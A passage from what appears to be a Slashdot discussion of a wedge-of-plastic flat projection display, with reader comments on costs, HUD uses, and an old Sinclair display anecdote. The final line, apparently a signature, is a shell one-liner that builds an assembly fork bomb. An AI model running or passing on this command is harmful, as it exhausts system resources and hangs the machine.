New LCD Flatscreen Concept: A Wedge of Plastic
SimianOverlord writes "The Register reports on an innovation in the field of flat panel LCD screens that promises cheaper screens with the same quality using existing manufacturing technology. A Flat Projection Display is created by bouncing light into a thin wedge of plastic from the bottom of the screen, at just the correct angle to allow the rebounded light to escape at the correct pixel. "We have to play around with the image to make sure that the pixels don't bunch up" explained Prof. Travis, the inventor. "If you don't do that the image can appear a little like an image reflected off water" The new technology has already attracted interest from a major TV maker, but don't expect them in your laptop until projector minaturization catches up."
I wonder if this could work with HUD or for display injection into a pair of glasses? That would be neat - to have the image in your glasses / windscreen!
***You learn something Every day. And then you die.***
Anyone else picturing all their pixels sliding down to the corner of the screen in a pink mess..?
The video on their website is crap. Don't try it...
If I had a dime for every new display technology (or other kind of cool technologies) that gets in the papers, I could go to the same clubs of Warren Buffet. But if I had it for the technologies that actually reach me as a consumer, I could barely buy a film ticket, depending on city.
I don't know exactly why it is but it's a fact. I'm thinking of making a list. It may make for funny reading ten years from now.
Rome taught me patience and assiduous application to detail. Virtues which temper the boldness of great, general views.
You might call this a prism. The concept of bouncing light off of the inside edge of a prism is what happens in the pentaprism mirror inside a slr camera.
The big advantage that I can see with this is that a reasonable quality plastic wedge/prism should be much cheaper to replace when it gets damaged. I'm sure the initial cost will still be high, but the expensive stuff can be a little more protected.
eric
Cheap silicon wins again -- it's been supplanting copper, now optics.
"Glory is fleeting, but obscurity is forever." --Napoleon Bonaparte
If projection tech needs to catch up so we can use this in a TV or laptop, it'll have to catch up even more to allow it to be used in glasses. But a bigger problem is that the light exits the wedge vertically (or horizontally, if the wedge is sideways), so the diffusing coating they use to make it visible in front or behind would affect transparency.
Paul "Say no to feeping creaturism"
A prominent female fashion guru has just announced his new master piece, a dress made with 'Flat Projection Display' as it's only fabric.
"With it, ladies all over may customise their clothing with any pattern or picture they want", beamed the millionaire dressmaker.
However, he declined comment on what would happen to the otherwise transparent dress after it's power supply, rated for 23 minutes of use, failed.
Sometimes I wish I was a plumber, then I'd know how to deal with other people's shit.
why not make screens with no dead or stuck pixels? It's a huge pain in the ass to repack the new screen and bring it back to the store because ONE pixel is not working properly.
And manufacturers, here's a clue for your QC people: there is no such thing as "acceptable amount of defective pixels". I don't care if they're not touching or not, if they work above 30 degrees Celsius or when submerged in KY jelly. If I'm buying a new car there are no dents or scratches on it, so why should your screens be any different?
Personal air travel!
Take off anywhere, land anywhere. Fast, secure, simple.
Just wait until airplane miniaturization catches up.
--
Wiki de Ciencia Ficcion y Fantasia
They have developed an ill fitting sawtoothed double paned glass window that pushes more light further into the room, and less hits the area directly below the window, making offices lighter.
/angles were such that you got a perfect image.
This is basically doing the same but replacing light with a projector source.
Imagine a specially moulded radially displaced set of panes, that had a central gun firing at them in a 180 arc, and the timing
Make sense?
the viewing angle would have to be compensated a bit...
Check new scientist for the story on lighter windows.
#hostfile 0.0.0.0 primidi.com 0.0.0.0 www.primidi.com 0.0.0.0 radio.weblogs.com
http://www.io2technology.com/dojo/178/v.jsp Free Space Display, Project the Images into the Air... No need for bulky Screens... Think it will work?
Injection molding plastic is cheaper than tube manufacturing.
CRT alignment is still adjusted by a human. Injection molding does not require human intervention.
if you steal from one source, that is plagiarism, if you steal from many, well, that's just research.
I read a funny review of the Z88 a long time ago. The Z88 had a small LCD display "bought from the Japanese", but that was the result of an epic battle inside Sinclair. Clive Sinclair himself was quoted as saying "LCD's are rubbish, we have the only real portable display technology". This was based on the Sinclair pocket TV, which bent electron beams through 90 degrees with a big magnet. The journalist writing the review said that he saw a demonstration and "you placed your chin on a rest, and saw a ghostly green four lines of twenty characters floating in the infinite distance."
There was a memorable conversation with Alan Sugar who bought the Sinclair
Reviewer: Do you have the rights to the Pandora display?
AS: We have the rights to all the Sinclair patents
R: Do you plan any products based on Pandora?
AS: Have you seen it?
R: Yes.
AS: Well then.
Oddly, no Pandora based products were ever produced.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;